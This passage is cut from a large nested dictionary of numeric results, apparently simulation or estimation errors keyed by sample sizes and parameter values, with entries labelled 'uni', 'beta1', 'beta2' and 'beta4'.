{'uni': 0.14183665282462907, 'beta1': 0.02592201655783873, 'beta2': 0.4317014020935504, 'beta4': [0.017506491846792815, 1.0396479032970523]}, 75: {'uni': 0.13469268827271816, 'beta1': 0.03072455411464323, 'beta2': 0.40854305278610353, 'beta4': [0.023802069158570326, 1.0345503480689766]}, 50: {'uni': 0.2267326479955361, 'beta1': 0.06283204007090228, 'beta2': 0.47352253571629066, 'beta4': [0.03299971248019334, 1.0307427172444934]}, 30: {'uni': 0.30926013693933796, 'beta1': 0.12802403468984566, 'beta2': 0.5919033598519557, 'beta4': [0.0446428946566547, 1.024235192981656]}, 20: {'uni': 0.36495683958552094, 'beta1': 0.21502934587386965, 'beta2': 0.655814111969914, 'beta4': [0.0668219237466946, 1.0209794959351524]}, 10: {'uni': 0.5993358090672234, 'beta1': 0.41112679093508553, 'beta2': 0.7547878772085324, 'beta4': [0.09227814617364233, 1.0145010250500368]}}, 400: {1000: {'uni': 0.025896757785848847, 'beta1': 0.002275505689533187, 'beta2': 0.26906265954395275, 'beta4': [0.005316252950804182, 1.1053525286504498]}, 750: {'uni': 0.030999475873056417, 'beta1': 0.0013746739567481712, 'beta2': 0.24465392626230614, 'beta4': [0.005176818412544991, 1.1019675368471202]}, 500: {'uni': 0.025622811417340657, 'beta1': 0.0019022171807471847, 'beta2': 0.24729224167591998, 'beta4': [0.005578228859751129, 1.1013403509292035]}, 400: {'uni': 0.029561442343993004, 'beta1': 0.002048023106808748, 'beta2': 0.27637565566664013, 'beta4': [0.004998616282624286, 1.0859532939934569]}, 300: {'uni': 0.03571761814634283, 'beta1': 0.002437177583227123, 'beta2': 0.2700165589811169, 'beta4': [0.007821456553393443, 1.0785300663455835]}, 200: {'uni': 0.05477353463547685, 'beta1': 0.007157574589887143, 'beta2': 0.36000438163781423, 'beta4': [0.009477632290181273, 1.0679008578747287]}, 150: {'uni': 0.07637914396289984, 'beta1': 0.008214072491315897, 'beta2': 0.3313508914969982, 'beta4': [0.010896098343519681, 1.0606215920525077]}, 100: {'uni': 0.11381210686532531, 'beta1': 0.018398479440258932, 'beta2': 
0.3848114060260855, 'beta4': [0.01842792204189153, 1.0494021227638108]}, 75: {'uni': 0.13235635536736093, 'beta1': 0.0400207536216299, 'beta2': 0.43622251050409433, 'beta4': [0.02096042420956011, 1.0417337524508474]}, 50: {'uni': 0.20784298399859202, 'beta1': 0.07130540772043548, 'beta2': 0.5172134773734999, 'beta4': [0.031019984250849474, 1.0399235220946341]}, 30: {'uni': 0.2806740167803171, 'beta1': 0.11704543446506291, 'beta2': 0.5702527726239361, 'beta4': [0.04554425947712502, 1.0308498609198327]}, 20: {'uni': 0.40246892267081, 'beta1': 0.20410446629412546, 'beta2': 0.6441518759507474, 'beta4': [0.05556042308335842, 1.0232480248410107]}, 10: {'uni': 0.598029613692239, 'beta1': 0.3829637206480797, 'beta2': 0.764251193581595, 'beta4': [0.09040730486062148, 1.019159751691838]}}, 300: {1000: {'uni': 0.03927216885312887, 'beta1': 0.0028801095098431964, 'beta2': 0.24947150687424588, 'beta4': [0.006471187793034744, 1.160842602904632]}, 750: {'uni': 0.04444164944164811, 'beta1': 0.002888622051822249, 'beta2': 0.2592722580304042, 'beta4': [0.006201130494927228, 1.1590062388205389]}, 500: {'uni': 0.03386451243834725, 'beta1': 0.0038221572392608933, 'beta2': 0.27658117256322334, 'beta4': [0.006739074173776894, 1.1233561596091521]}, 400: {'uni': 0.04800908765953219, 'beta1': 0.003065738369982432, 'beta2': 0.28548162501904323, 'beta4': [0.00606252876571075, 1.108126781417158]}, 300: {'uni': 0.05760353656127645, 'beta1': 0.003795886776418645, 'beta2': 0.2863528848787791, 'beta4': [0.006410206857481998, 1.1008081595374801]}, 200: {'uni': 0.05530565353026629, 'beta1': 0.007022220375979206, 'beta2': 0.3218109561131835, 'beta4': [0.008012846276247196, 1.0851800676090981]}, 150: {'uni': 0.1015884659040974, 'beta1': 0.010932465278433428, 'beta2': 0.346711515967189, 'beta4': [0.01438935035588938, 1.0772279067151915]}, 100: {'uni': 0.10066039964522674, 'beta1': 0.019599157825161983, 'beta2': 0.3976221533440906, 'beta4': [0.016667365195821262, 1.0619499723924766]}, 75: {'uni': 
0.13815160891461617, 'beta1': 0.03502822760481833, 'beta2': 0.4383232053771871, 'beta4': [0.020620270083654274, 1.0613801533703469]}, 50: {'uni': 0.2066489219754158, 'beta1': 0.06567958756880526, 'beta2': 0.4952136429816835, 'beta4': [0.030838115238396878, 1.0494382597763074]}, 30: {'uni': 0.3439260948693291, 'beta1': 0.1260781571060967, 'beta2': 0.5639845179676323, 'beta4': [0.043988630038169885, 1.0379761722153382]}, 20: {'uni': 0.373632536240914, 'beta1': 0.198641104511171, 'beta2': 0.6452030053501869, 'beta4': [0.05742329072620164, 1.0343631164659426]}, 10: {'uni': 0.5786272688848213, 'beta1': 0.38699506401815836, 'beta2': 0.7654074587403914, 'beta4': [0.09447939575707047, 1.0225736679875932]}}, 200: {1000: {'uni': 0.06593180893978717, 'beta1': 0.004952441169426624, 'beta2': 0.32211181174186826, 'beta4': [0.009731394920594555, 1.2036434242302154]}, 750: {'uni': 0.050050536074611546, 'beta1': 0.006136627342269299, 'beta2': 0.41164072649474215, 'beta4': [0.008362211620772572, 1.2102293050053385]}, 500: {'uni': 0.05148222892421142, 'beta1': 0.0044901273914807575, 'beta2': 0.3278867264985391, 'beta4': [0.010669013908256336, 1.19341818888688]}, 400: {'uni': 0.05311457852860502, 'beta1': 0.006855300638757073, 'beta2': 0.3051136005232666, 'beta4': [0.008864068572306396, 1.1940907811101498]}, 300: {'uni': 0.058569513810713326, 'beta1': 0.006359938814453158, 'beta2': 0.3510907562210193, 'beta4': [0.01035722486111736, 1.1576432677671158]}, 200: {'uni': 0.07231911900208032, 'beta1': 0.009541107607029078, 'beta2': 0.3406432710228655, 'beta4': [0.009895950553842075, 1.134981886136477]}, 150: {'uni': 0.06879337077817359, 'beta1': 0.00908941619076127, 'beta2': 0.3562401517641972, 'beta4': [0.012642116783133737, 1.126631367592092]}, 100: {'uni': 0.09847445660132435, 'beta1': 0.023351167906981215, 'beta2': 0.3702057371167343, 'beta4': [0.020174892176101, 1.1035884364086865]}, 75: {'uni': 0.13842215822110243, 'beta1': 0.040074923811621865, 'beta2': 0.4016290449749483, 'beta4': 
[0.025368667272077594, 1.0816686828715776]}, 50: {'uni': 0.2319732833555621, 'beta1': 0.058682815020592964, 'beta2': 0.449773155245931, 'beta4': [0.02730342261673676, 1.072599635960804]}, 30: {'uni': 0.3101271727138763, 'beta1': 0.12657777631872538, 'beta2': 0.5474897963622241, 'beta4': [0.051145369772815974, 1.0623736422151917]}, 20: {'uni': 0.3961402044589855, 'beta1': 0.19850885747842734, 'beta2': 0.6186209195012662, 'beta4': [0.05940991818827158, 1.0513644617190916]}, 10: {'uni': 0.5757986824828967, 'beta1': 0.40423129685515935, 'beta2': 0.7505415142571369, 'beta4': [0.09379731922689409, 1.039165679271243]}}, 150: {1000: {'uni': 0.06409389658307825, 'beta1': 0.009910476131101938, 'beta2': 0.3806517369874718, 'beta4': [0.017842367687703767, 1.273216215005103]}, 750: {'uni': 0.07885955543671457, 'beta1': 0.013763072632693718, 'beta2': 0.3644659021625199, 'beta4': [0.011918256361555676, 1.2636715858729746]}, 500: {'uni': 0.0782362103749921, 'beta1': 0.011063387421172906, 'beta2': 0.3492767192933155, 'beta4': [0.015527147770540454, 1.2388524034789448]}, 400: {'uni': 0.08206814173951552, 'beta1': 0.0105477079679912, 'beta2': 0.36894084845731795, 'beta4': [0.014908702122614857, 1.212354152577374]}, 300: {'uni': 0.07712147055703845, 'beta1': 0.013570500873764199, 'beta2': 0.3886339629626576, 'beta4': [0.01257341645320956, 1.1948059873364203]}, 200: {'uni': 0.07403838281349277, 'beta1': 0.014174956292383793, 'beta2': 0.3950286524652677, 'beta4': [0.011937421306978668, 1.1777024261360427]}, 150: {'uni': 0.08411412518651155, 'beta1': 0.012028423896870248, 'beta2': 0.3818541442194885, 'beta4': [0.01208166846307851, 1.1514427861414884]}, 100: {'uni': 0.10466099788702969, 'beta1': 0.021407915808379432, 'beta2': 0.536739509831108, 'beta4': [0.016639317502525126, 1.1213359880442546]}, 75: {'uni': 0.1639590772562653, 'beta1': 0.029456618460635874, 'beta2': 0.4241204047591904, 'beta4': [0.020685089221907236, 1.1220699258280653]}, 50: {'uni': 0.21195935570350966, 'beta1': 
0.050872484133304474, 'beta2': 0.48434321428634336, 'beta4': [0.03329067097448155, 1.1042086282877204]}, 30: {'uni': 0.30021647417605113, 'beta1': 0.1596029309488946, 'beta2': 0.5716372430031915, 'beta4': [0.0499410592964029, 1.0773251535218258]}, 20: {'uni': 0.3949077922550226, 'beta1': 0.2117560147178309, 'beta2': 0.6654963464294259, 'beta4': [0.06269582775240698, 1.0662881676425546]}, 10: {'uni': 0.5789591056497254, 'beta1': 0.42152167320469863, 'beta2': 0.7554936621338648, 'beta4': [0.09424799097838252, 1.0533803023202404]}}, 100: {1000: {'uni': 0.1194156470953036, 'beta1': 0.01975867033885883, 'beta2': 0.38041630466120363, 'beta4': [0.024152237250705463, 1.4090426779720273]}, 750: {'uni': 0.1339598298370513, 'beta1': 0.02312816824466994, 'beta2': 0.36885145013242054, 'beta4': [0.01982726902974318, 1.3708518857235923]}, 500: {'uni': 0.1035033245625255, 'beta1': 0.020732864110625814, 'beta2': 0.45503343746867975, 'beta4': [0.018104556463916902, 1.3457075667383138]}, 400: {'uni': 0.13886200283191671, 'beta1': 0.033658545561272284, 'beta2': 0.4492892269062327, 'beta4': [0.018812997051150655, 1.3133090999063297]}, 300: {'uni': 0.1081039869660674, 'beta1': 0.025748028713259506, 'beta2': 0.4804479970623521, 'beta4': [0.019440969752786388, 1.3645100349536026]}, 200: {'uni': 0.10834338931329811, 'beta1': 0.025134994582497336, 'beta2': 0.44719795518594385, 'beta4': [0.01985586858794121, 1.271297008277481]}, 150: {'uni': 0.10712222517002118, 'beta1': 0.022613877946775662, 'beta2': 0.47758394504359103, 'beta4': [0.019572061091874843, 1.2574112506220025]}, 100: {'uni': 0.1668102455464986, 'beta1': 0.028918170904344648, 'beta2': 0.5875385470461234, 'beta4': [0.01921321761305392, 1.2005469273434903]}, 75: {'uni': 0.14135594283467587, 'beta1': 0.0414053687092711, 'beta2': 0.447284407621719, 'beta4': [0.02519589264892086, 1.1702958014284723]}, 50: {'uni': 0.17825851499059536, 'beta1': 0.0602645575613488, 'beta2': 0.5425738075050448, 'beta4': [0.0318471605346179, 
1.1527026666904288]}, 30: {'uni': 0.31553458317183447, 'beta1': 0.11288833543480611, 'beta2': 0.5420894350287434, 'beta4': [0.04618637746422554, 1.1126856866808228]}, 20: {'uni': 0.40279034362262994, 'beta1': 0.2014111707304979, 'beta2': 0.5994182473676781, 'beta4': [0.06368202517740608, 1.1083190253440836]}, 10: {'uni': 0.5758568363154362, 'beta1': 0.37794937111554805, 'beta2': 0.7414226913600013, 'beta4': [0.10749142038604542, 1.078648425767379]}}, 75: {1000: {'uni': 0.15198660481824744, 'beta1': 0.036008431318779996, 'beta2': 0.4722224787708969, 'beta4': [0.027516412068499897, 1.534216828529965]}, 750: {'uni': 0.17208264399948853, 'beta1': 0.03909264011281362, 'beta2': 0.6400645338590032, 'beta4': [0.02340077871735158, 1.4753355323679431]}, 500: {'uni': 0.1680012490284888, 'beta1': 0.05632032512882802, 'beta2': 0.5903766149915854, 'beta4': [0.020364313693572396, 1.4541567750184143]}, 400: {'uni': 0.143726941597115, 'beta1': 0.05071904581785537, 'beta2': 0.4303060292771255, 'beta4': [0.03295149694207187, 1.399313576809266]}, 300: {'uni': 0.18177622688584122, 'beta1': 0.047176957786292203, 'beta2': 0.5493492545653206, 'beta4': [0.022838896555165238, 1.3583642788350967]}, 200: {'uni': 0.15601957161470076, 'beta1': 0.036011709792265006, 'beta2': 0.5731923214795615, 'beta4': [0.025949998185882228, 1.378321286217048]}, 150: {'uni': 0.13257484917386256, 'beta1': 0.04822774386024882, 'beta2': 0.5831931502945309, 'beta4': [0.032781898025316815, 1.3687382603624914]}, 100: {'uni': 0.17722038629436307, 'beta1': 0.042694795909128086, 'beta2': 0.6029512404969393, 'beta4': [0.029877309146450395, 1.2681586706189192]}, 75: {'uni': 0.15891757845874932, 'beta1': 0.05355874965931141, 'beta2': 0.5300785911451448, 'beta4': [0.024918571880254658, 1.249215328218056]}, 50: {'uni': 0.18061682437151294, 'beta1': 0.05778453530955624, 'beta2': 0.5259465500991863, 'beta4': [0.02589140629920943, 1.1870268806723268]}, 30: {'uni': 0.2932284826916738, 'beta1': 0.12331237733161636, 'beta2': 
0.5673856570268109, 'beta4': [0.044505647902749156, 1.155359943383599]}, 20: {'uni': 0.4521356971815503, 'beta1': 0.18953667103215918, 'beta2': 0.610039387320265, 'beta4': [0.0582975169999248, 1.1287493981989316]}, 10: {'uni': 0.5902047893457638, 'beta1': 0.399006287470108, 'beta2': 0.7279029685166025, 'beta4': [0.09005082946454858, 1.1274449949615486]}}, 50: {1000: {'uni': 0.2592076419350719, 'beta1': 0.08467191522733127, 'beta2': 0.734314769066797, 'beta4': [0.04213219735340979, 1.7222471762357856]}, 750: {'uni': 0.22167472117269596, 'beta1': 0.09540608751728515, 'beta2': 0.6421055730602457, 'beta4': [0.0504857786224193, 1.7019362614923808]}, 500: {'uni': 0.24531208210966063, 'beta1': 0.10627289268903653, 'beta2': 0.6456700227453712, 'beta4': [0.037069614011306415, 1.5187817437439013]}, 400: {'uni': 0.23695230367792885, 'beta1': 0.1002348842240865, 'beta2': 0.6049088807842221, 'beta4': [0.037868788524990434, 1.7812259821193235]}, 300: {'uni': 0.23115353035249844, 'beta1': 0.09531354298937929, 'beta2': 0.6911305993958063, 'beta4': [0.04299005884233124, 1.6010012435025673]}, 200: {'uni': 0.281525317673935, 'beta1': 0.09540124922896594, 'beta2': 0.6097339897307856, 'beta4': [0.037532176774296495, 1.6532632152046558]}, 150: {'uni': 0.22683249774663827, 'beta1': 0.08442270699935141, 'beta2': 0.7320138430968691, 'beta4': [0.03990371983864124, 1.4661997548716317]}, 100: {'uni': 0.2430263267539406, 'beta1': 0.10006392357305124, 'beta2': 0.7821900964967258, 'beta4': [0.03933639350774809, 1.391655290350789]}, 75: {'uni': 0.276189771579198, 'beta1': 0.0887640194455103, 'beta2': 0.6129637162484526, 'beta4': [0.03756894113400522, 1.390111322107257]}, 50: {'uni': 0.29778921217600474, 'beta1': 0.08612400831717622, 'beta2': 0.666981830661031, 'beta4': [0.031164853582807427, 1.3358991647553666]}, 30: {'uni': 0.2724782219999575, 'beta1': 0.13307131181798842, 'beta2': 0.6442109151591487, 'beta4': [0.04036794068199744, 1.2563196523679523]}, 20: {'uni': 0.41797425695598467, 'beta1': 
0.1882874604106344, 'beta2': 0.7691372650156472, 'beta4': [0.059432531917173244, 1.2208571964471882]}, 10: {'uni': 0.5534689290667542, 'beta1': 0.4309100389659457, 'beta2': 0.7401015027587745, 'beta4': [0.09902687359586748, 1.1629411926124198]}}, 30: {1000: {'uni': 0.42071315434786194, 'beta1': 0.3029377220718273, 'beta2': 0.812141471651635, 'beta4': [0.06650330678120728, 2.020979343996272]}, 750: {'uni': 0.4519278080535244, 'beta1': 0.23297010287113198, 'beta2': 1.2570282718489256, 'beta4': [0.08856354984151762, 1.900675005693711]}, 500: {'uni': 0.490379074291211, 'beta1': 0.22164571894561366, 'beta2': 1.1513628955563604, 'beta4': [0.06173029516131422, 2.106609476056458]}, 400: {'uni': 0.39408498283423027, 'beta1': 0.264918129333582, 'beta2': 0.8840846910050425, 'beta4': [0.05283404446603562, 2.029681875929849]}, 300: {'uni': 0.5427138663027202, 'beta1': 0.2379881723996197, 'beta2': 0.8363520498569965, 'beta4': [0.06281976632758741, 1.986886804942407]}, 200: {'uni': 0.41057068188367307, 'beta1': 0.21827805543776632, 'beta2': 0.9448279749895979, 'beta4': [0.07380808667104646, 1.82960910894638]}, 150: {'uni': 0.4803138989403234, 'beta1': 0.2391926745124124, 'beta2': 0.7949557568023287, 'beta4': [0.06065292517095262, 1.9106220557945983]}, 100: {'uni': 0.384454764576367, 'beta1': 0.21463268237662367, 'beta2': 1.0750644448071933, 'beta4': [0.05395328522325796, 1.6868737907037483]}, 75: {'uni': 0.37686548308814144, 'beta1': 0.1803066791969128, 'beta2': 0.8135615889320663, 'beta4': [0.05869896393842299, 1.758756502053507]}, 50: {'uni': 0.43171434803060726, 'beta1': 0.2505599625779312, 'beta2': 1.0757749691129281, 'beta4': [0.05273825248231705, 1.5564961938411799]}, 30: {'uni': 0.51976331390363, 'beta1': 0.2137422259138964, 'beta2': 0.9685059088900959, 'beta4': [0.05537585694294487, 1.492573272428689]}, 20: {'uni': 0.4398832977629888, 'beta1': 0.2038338719891519, 'beta2': 0.9093408387748209, 'beta4': [0.06105880798359843, 1.4158958005586584]}, 10: {'uni': 
0.602699561740835, 'beta1': 0.4091942418408925, 'beta2': 1.0985411109097716, 'beta4': [0.09013494857283567, 1.2751619916727241]}}, 20: {1000: {'uni': 0.8863415930595386, 'beta1': 0.4124138906473128, 'beta2': 1.488915214895412, 'beta4': [0.09369684930943876, 2.5300474929166104]}, 750: {'uni': 0.6761163081220196, 'beta1': 0.6112111176414844, 'beta2': 1.1574051144435042, 'beta4': [0.09350064236361985, 2.4233068456250466]}, 500: {'uni': 0.7326156383642906, 'beta1': 0.45488960268311474, 'beta2': 1.0667140010754592, 'beta4': [0.08539132003116143, 2.392318747646077]}, 400: {'uni': 0.9458240653327108, 'beta1': 0.5132179115834019, 'beta2': 1.1170018019059054, 'beta4': [0.09756400190793793, 2.383853429295003]}, 300: {'uni': 0.6953482539627818, 'beta1': 0.37005811426083546, 'beta2': 1.3395766294720786, 'beta4': [0.10236241919596632, 2.2424866381905315]}, 200: {'uni': 0.6752386657747762, 'beta1': 0.5629563163345486, 'beta2': 1.5090274583586125, 'beta4': [0.09418806419964053, 2.137879622888132]}, 150: {'uni': 0.6578393936141584, 'beta1': 0.40103058328304875, 'beta2': 1.486585761364853, 'beta4': [0.09597951072128233, 2.4974862138426848]}, 100: {'uni': 0.9223237716292768, 'beta1': 0.526962313037276, 'beta2': 1.3422875156501894, 'beta4': [0.11187693983427766, 2.390782201823441]}, 75: {'uni': 0.9378358647715992, 'beta1': 0.7320432373178699, 'beta2': 1.428360070177185, 'beta4': [0.08107123212486303, 1.9900453884534253]}, 50: {'uni': 0.5886779763529189, 'beta1': 0.7434142787005832, 'beta2': 1.490335833898308, 'beta4': [0.0867226219932577, 1.7708768543057836]}, 30: {'uni': 0.7844811065280236, 'beta1': 0.674585828881643, 'beta2': 1.3416765903993606, 'beta4': [0.10083853135007012, 1.8020388082207972]}, 20: {'uni': 0.6068962998473377, 'beta1': 0.5722158961739197, 'beta2': 1.5402314826280434, 'beta4': [0.09978682190916095, 1.6786815060076368]}, 10: {'uni': 0.6137740105070696, 'beta1': 0.6013842817208861, 'beta2': 1.4032123539466417, 'beta4': [0.09596686888019154, 1.4364997057965616]}}, 
10: {1000: {'uni': 2.5487977734820326, 'beta1': 3.093835089134801, 'beta2': 2.628311382488589, 'beta4': [0.17203346857254662, 4.565292216563792]}, 750: {'uni': 1.7304439175235797, 'beta1': 3.4056157251335355, 'beta2': 2.880595484342148, 'beta4': [0.166405967714536, 4.699029049816299]}, 500: {'uni': 2.3351084717688373, 'beta1': 4.452247264467255, 'beta2': 2.6188955235283458, 'beta4': [0.20056108653416985, 4.087275033325601]}, 400: {'uni': 2.731195017919183, 'beta1': 2.350880124717626, 'beta2': 2.856370147812412, 'beta4': [0.16295115167167193, 4.24552877727418]}, 300: {'uni': 2.6641281409091975, 'beta1': 2.1576795517926084, 'beta2': 2.5130859559443004, 'beta4': [0.16779978199870219, 3.868571825041176]}, 200: {'uni': 1.5900925503183005, 'beta1': 3.1409755807227073, 'beta2': 2.2138809993371926, 'beta4': [0.1593318444045239, 4.790452032349865]}, 150: {'uni': 1.6286417760707215, 'beta1': 2.75377845626076, 'beta2': 3.67929821312175, 'beta4': [0.17531673356231803, 4.449312838541493]}, 100: {'uni': 1.8811969967887474, 'beta1': 2.9356208183819876, 'beta2': 2.473884077752684, 'beta4': [0.1709344371346987, 3.647827690030222]}, 75: {'uni': 1.8560795641118366, 'beta1': 3.1515350543410756, 'beta2': 3.0880468571889907, 'beta4': [0.15535292216279414, 4.064998701862136]}, 50: {'uni': 1.8814827053991783, 'beta1': 2.374493146782945, 'beta2': 3.008522859298132, 'beta4': [0.18437354728017072, 3.38720140624215]}, 30: {'uni': 1.48455109714551, 'beta1': 1.9410442694643812, 'beta2': 2.623047438090551, 'beta4': [0.14962804639542013, 2.944732475701521]}, 20: {'uni': 2.2606118912147144, 'beta1': 2.857453424374173, 'beta2': 2.6002878870531627, 'beta4': [0.16364368010741698, 3.0232270039247746]}, 10: {'uni': 2.0419910091282496, 'beta1': 2.278659514136714, 'beta2': 4.444036437620339, 'beta4': [0.1414900750503085, 2.359580377512841]}}}, 0.25: {1000: {1000: {'uni': 0.013195418550431052, 'beta1': 0.00033599202159974306, 'beta2': 0.17875776570990679, 'beta4': [0.001842483224513699, 
1.0501146695568533]}, 750: {'uni': 0.016013552511175373, 'beta1': 0.0007448601839703062, 'beta2': 0.1939607247455362, 'beta4': [0.0026832198909584985, 1.045851171150504]}, 500: {'uni': 0.028606084800545467, 'beta1': 0.0009990776069765802, 'beta2': 0.23019643865863643, 'beta4': [0.0039038637470758205, 1.0408378665938753]}, 400: {'uni': 0.026784771828518836, 'beta1': 0.0017503690452189602, 'beta2': 0.23880661743287537, 'beta4': [0.0044638088057132085, 1.0339823686261234]}, 300: {'uni': 0.044901759577933735, 'beta1': 0.003137529397079459, 'beta2': 0.28413102290789566, 'beta4': [0.00570921365480773, 1.0296508775897812]}, 200: {'uni': 0.06082540361236728, 'beta1': 0.0063974879798100875, 'beta2': 0.30606916955325597, 'beta4': [0.008520697454289822, 1.0269966675849775]}, 150: {'uni': 0.07655707515610163, 'beta1': 0.013948369547467494, 'beta2': 0.33861090522030257, 'beta4': [0.011996336066692004, 1.0232867029647827]}, 100: {'uni': 0.10338298270717705, 'beta1': 0.018877705317333838, 'beta2': 0.45060055459442544, 'beta4': [0.022990283509798048, 1.0179700562252552]}, 75: {'uni': 0.1396659034571349, 'beta1': 0.03581049481895991, 'beta2': 0.4434539695729213, 'beta4': [0.020437099800626753, 1.0153667391680519]}, 50: {'uni': 0.19106507905911785, 'beta1': 0.06485537073911667, 'beta2': 0.4863070473264254, 'beta4': [0.03218176626342667, 1.0137839199153011]}, 30: {'uni': 0.3267417047168397, 'beta1': 0.11404304917468981, 'beta2': 0.588828283618436, 'beta4': [0.04423747548783673, 1.0114786486125193]}, 20: {'uni': 0.38420849857792005, 'beta1': 0.193594506472965, 'beta2': 0.6372453314564789, 'beta4': [0.06361050423708928, 1.0091615128119644]}, 10: {'uni': 0.5693675845737495, 'beta1': 0.39041102697990016, 'beta2': 0.7566315490210422, 'beta4': [0.09008771114132266, 1.0069189003128556]}}, 750: {1000: {'uni': 0.015017581623422201, 'beta1': 0.0005229969093151775, 'beta2': 0.2203058886730741, 'beta4': [0.00279784709123115, 1.064456900017356]}, 750: {'uni': 0.016904201481230167, 'beta1': 
0.0005338291902363273, 'beta2': 0.19340880740923883, 'beta4': [0.00261926497056331, 1.0579321298839985]}, 500: {'uni': 0.027943172620408567, 'beta1': 0.0015318638527157646, 'beta2': 0.25409206714489535, 'beta4': [0.003575838793613114, 1.0492278279222302]}, 400: {'uni': 0.03118864795904444, 'beta1': 0.0016085289162773252, 'beta2': 0.24158631574832493, 'beta4': [0.004570704595623831, 1.043307593616712]}, 300: {'uni': 0.03939923254929314, 'beta1': 0.002394440069879624, 'beta2': 0.27881013797398596, 'beta4': [0.008032996377590652, 1.0410106273195696]}, 200: {'uni': 0.051906798122560396, 'beta1': 0.006278530092671409, 'beta2': 0.30644670823465214, 'beta4': [0.008433048809803174, 1.0336123797928127]}, 150: {'uni': 0.07326600862954896, 'beta1': 0.008905435316224583, 'beta2': 0.37113421026799154, 'beta4': [0.014546850850626635, 1.0289169977314274]}, 100: {'uni': 0.11189329019372281, 'beta1': 0.019846735456416045, 'beta2': 0.39542365294265347, 'beta4': [0.018208296987618746, 1.025766689306411]}, 75: {'uni': 0.1678484331707909, 'beta1': 0.029574402442326134, 'beta2': 0.42874417776423157, 'beta4': [0.02055972472321407, 1.0234873870502206]}, 50: {'uni': 0.1952271332661482, 'beta1': 0.05132180284455529, 'beta2': 0.5101942514065345, 'beta4': [0.029538584572671573, 1.0205709311816702]}, 30: {'uni': 0.29549103341642446, 'beta1': 0.11375382235525358, 'beta2': 0.5774010134797688, 'beta4': [0.043397134001584924, 1.0149572928091315]}, 20: {'uni': 0.369054813439251, 'beta1': 0.18753690050721722, 'beta2': 0.6302442146655091, 'beta4': [0.05905591166068328, 1.0127070855268694]}, 10: {'uni': 0.5705723645153031, 'beta1': 0.33538869001095784, 'beta2': 0.7536693315538421, 'beta4': [0.09090966706285687, 1.0096300679209578]}}, 500: {1000: {'uni': 0.021889557244944267, 'beta1': 0.0016084377298841322, 'beta2': 0.22093243033409488, 'beta4': [0.0044242546343159885, 1.0942706517572218]}, 750: {'uni': 0.0282779819663743, 'beta1': 0.0010063238278199597, 'beta2': 0.22801622968391058, 'beta4': 
[0.003524960547103637, 1.0847550545283853]}, 500: {'uni': 0.02396940909943071, 'beta1': 0.0012467850959314592, 'beta2': 0.2403896865764518, 'beta4': [0.004622510648582559, 1.078998095038962]}, 400: {'uni': 0.029529299989594714, 'beta1': 0.0012555606744509623, 'beta2': 0.26866034442080555, 'beta4': [0.004369392231828045, 1.0635484692436274]}, 300: {'uni': 0.03991254665867394, 'beta1': 0.00255822522826619, 'beta2': 0.2642231017828307, 'beta4': [0.005987976762930624, 1.0603589784153802]}, 200: {'uni': 0.06061810982823111, 'beta1': 0.004931950447678618, 'beta2': 0.3192877286208291, 'beta4': [0.00779126287388132, 1.047823237900618]}, 150: {'uni': 0.08309549670478669, 'beta1': 0.00964244354795674, 'beta2': 0.34286215766481964, 'beta4': [0.01441652340985287, 1.0466346852282493]}, 100: {'uni': 0.10587341186654257, 'beta1': 0.01978694887441401, 'beta2': 0.39279220465296005, 'beta4': [0.018506230081135853, 1.0370421759695896]}, 75: {'uni': 0.13396967983613503, 'beta1': 0.028619271263970607, 'beta2': 0.4432603614897364, 'beta4': [0.027804200013461133, 1.0299777798090028]}, 50: {'uni': 0.21077312314667257, 'beta1': 0.05886988860232499, 'beta2': 0.46155116123085194, 'beta4': [0.03078387179932803, 1.0289576178335533]}, 30: {'uni': 0.3131438067304429, 'beta1': 0.11687966328016658, 'beta2': 0.5663680930743225, 'beta4': [0.04808898498893729, 1.0239674123992182]}, 20: {'uni': 0.3569885336276907, 'beta1': 0.1869604203182388, 'beta2': 0.5988532407417108, 'beta4': [0.05835834115870568, 1.0204858684172466]}, 10: {'uni': 0.5803490099111785, 'beta1': 0.36069945606514914, 'beta2': 0.7395010191228991, 'beta4': [0.08620087384471821, 1.013087530204457]}}, 400: {1000: {'uni': 0.026575918392955672, 'beta1': 0.002392815941304911, 'beta2': 0.24456541440243038, 'beta4': [0.004797919837938112, 1.1253811146360175]}, 750: {'uni': 0.02644965057420995, 'beta1': 0.002199022745448091, 'beta2': 0.24959821674028976, 'beta4': [0.004905034300258548, 1.104013219668593]}, 500: {'uni': 0.02959411665644158, 
'beta1': 0.0016885572723923717, 'beta2': 0.24898911593101478, 'beta4': [0.004745438922447355, 1.088997665442233]}, 400: {'uni': 0.03502641320504352, 'beta1': 0.0016786943439029485, 'beta2': 0.2621921403404168, 'beta4': [0.004346224166041328, 1.0878846972621905]}, 300: {'uni': 0.04520325219647054, 'beta1': 0.0025501491440857887, 'beta2': 0.28592593421863094, 'beta4': [0.005324036219642212, 1.0691502375303021]}, 200: {'uni': 0.060109075263989446, 'beta1': 0.0052223884602183, 'beta2': 0.3125300226275192, 'beta4': [0.009280681826497663, 1.061558045261655]}, 150: {'uni': 0.07576829707995025, 'beta1': 0.007564903489288599, 'beta2': 0.3427799333015165, 'beta4': [0.011798396618607104, 1.0571740473117883]}, 100: {'uni': 0.11065680954182613, 'beta1': 0.01869098098454615, 'beta2': 0.4074253856786578, 'beta4': [0.015345065823318946, 1.0495661343336482]}, 75: {'uni': 0.12655190907350036, 'beta1': 0.03233447613785924, 'beta2': 0.4488100553399162, 'beta4': [0.024128531781180237, 1.0457037327331788]}, 50: {'uni': 0.17398297564543322, 'beta1': 0.05681149532603595, 'beta2': 0.4627537389486546, 'beta4': [0.030088173703089676, 1.036191980100532]}, 30: {'uni': 0.2783538553040459, 'beta1': 0.11152420121298304, 'beta2': 0.5659592579757353, 'beta4': [0.044256366871811184, 1.032758713111244]}, 20: {'uni': 0.40117304365295786, 'beta1': 0.2243708212441248, 'beta2': 0.6328241267767309, 'beta4': [0.05549991056298481, 1.0242052145141003]}, 10: {'uni': 0.5663957187651154, 'beta1': 0.367708243523239, 'beta2': 0.7561886475209632, 'beta4': [0.08503946611358437, 1.018904469921347]}}, 300: {1000: {'uni': 0.044566279105790474, 'beta1': 0.003327100530729034, 'beta2': 0.24078148356606432, 'beta4': [0.007288512460233923, 1.1407560034413293]}, 750: {'uni': 0.04277094007544684, 'beta1': 0.0021792994032752817, 'beta2': 0.3059000327593824, 'beta4': [0.006180875297249271, 1.1416369645421611]}, 500: {'uni': 0.035686740283980896, 'beta1': 0.0031967310027901977, 'beta2': 0.26516243628185904, 'beta4': 
